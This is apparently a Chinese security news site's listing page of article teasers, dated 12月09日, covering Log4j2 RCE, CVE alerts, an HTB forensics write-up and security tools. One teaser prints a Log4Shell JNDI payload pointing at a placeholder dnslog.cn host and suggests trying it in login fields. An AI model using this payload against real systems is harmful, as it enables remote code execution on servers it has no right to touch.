admin 发表的所有文章 | CN-SEC 中文网

安全漏洞

漏洞风险提示｜Log4j2 远程代码执行漏洞

// 边界无限漏洞风险提示一漏洞分析Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发，用来记录日志信息...

12月09日1,649 views评论

阅读全文

安全文章

一次HTB的取证之旅

记录一次HTB的取证旅途本来想着学习wireshark技巧，在htb逛的时候发现一个叫做obscure靶场，感觉有意思就开干。靶场的描述如下：CHALLENGE DESCRIPTIONAn attac...

12月09日199 views评论

阅读全文

安全开发

干货 | React 中的 Canvas 动画

作者简介掺水的酱油，携程软件技术专家，关注大前端及移动端相关技术。移动端硬件性能越来越好的今天，页面的交互也越来越丰富，Web 体验在不断向原生应用靠拢，加入了越来越多的手势与动画。除了常...

12月09日198 views评论

阅读全文

云安全

积极探索网络安全人才评价新机制

点击蓝字关注我们【编者按】实现我国科技强国战略目标，必须建立以科技创新质量、贡献、绩效为导向的网络安全人才分类评价体系，优化符合我国新时代发展需求的科技创新人才评价机制。现阶段，充分考虑我国网络安全人...

12月09日186 views评论

阅读全文

安全漏洞

高危！SonicWall Global VPN 客户端权限提升漏洞（CVE-2021-20047）

点击上方订阅话题第一时间...

12月09日382 views评论

阅读全文

安全漏洞

高危！Sockeye框架yaml 任意代码执行漏洞（CVE-2021-43811）

点击上方订阅话题第一时间...

12月09日198 views评论

阅读全文

安全工具

工具 | 一个为渗透测试与CTF而制作的工具集

项目地址https://github.com/ffffffff0x/BerylEnigma简介一个CTF+渗透测试工具包，主要实现一些常用的加密与编码功能，在软件使用过程中发现问题或建议欢迎提交 is...

12月09日268 views评论

阅读全文

安全文章

Log4j2 研究之lookup

一個稱得上優秀的框架，必備的要素之一可以通過某種約定的格式讀取到所運行環境中的配置信息。本文中我們就來感受下log4j2實現此項功能時的精妙設計。一概述“ Lookups provide a way...

12月09日316 views评论

阅读全文

安全文章

Log4j2 研究之lookup

12月09日327 views评论

阅读全文

安全文章

Log4j2 研究之lookup

12月09日272 views评论

阅读全文

安全漏洞

漏洞风险 Log4j2 远程代码执行漏洞

poc不知真假在登录口用户名密码都登录打一下就知道了${jndi:ldap://xxxxx.dnslog.cn/exp}漏洞风险提示：https://mp.weixin.qq.com/s/wC7mrK...

12月09日561 views评论

阅读全文

安全文章

可信安全网络 —— 安全左移之DDoS对抗

文｜宙斯盾DDoS防护团队RainsDDoS的开始互联网对人类文明的进步影响，不亚于蒸汽机发明对人类文明的影响。当人们享受着网络技术进步给生活带来的便利时，也经历了由于底层协议在设计之初对安全性考虑的...

12月09日99 views评论

阅读全文

admin

漏洞风险提示｜Log4j2 远程代码执行漏洞

一次HTB的取证之旅

干货 | React 中的 Canvas 动画

积极探索网络安全人才评价新机制

高危！SonicWall Global VPN 客户端权限提升漏洞（CVE-2021-20047）

高危！Sockeye框架yaml 任意代码执行漏洞（CVE-2021-43811）

工具 | 一个为渗透测试与CTF而制作的工具集

Log4j2 研究之lookup

Log4j2 研究之lookup

Log4j2 研究之lookup

漏洞风险 Log4j2 远程代码执行漏洞

可信安全网络 —— 安全左移之DDoS对抗

在线咨询

微信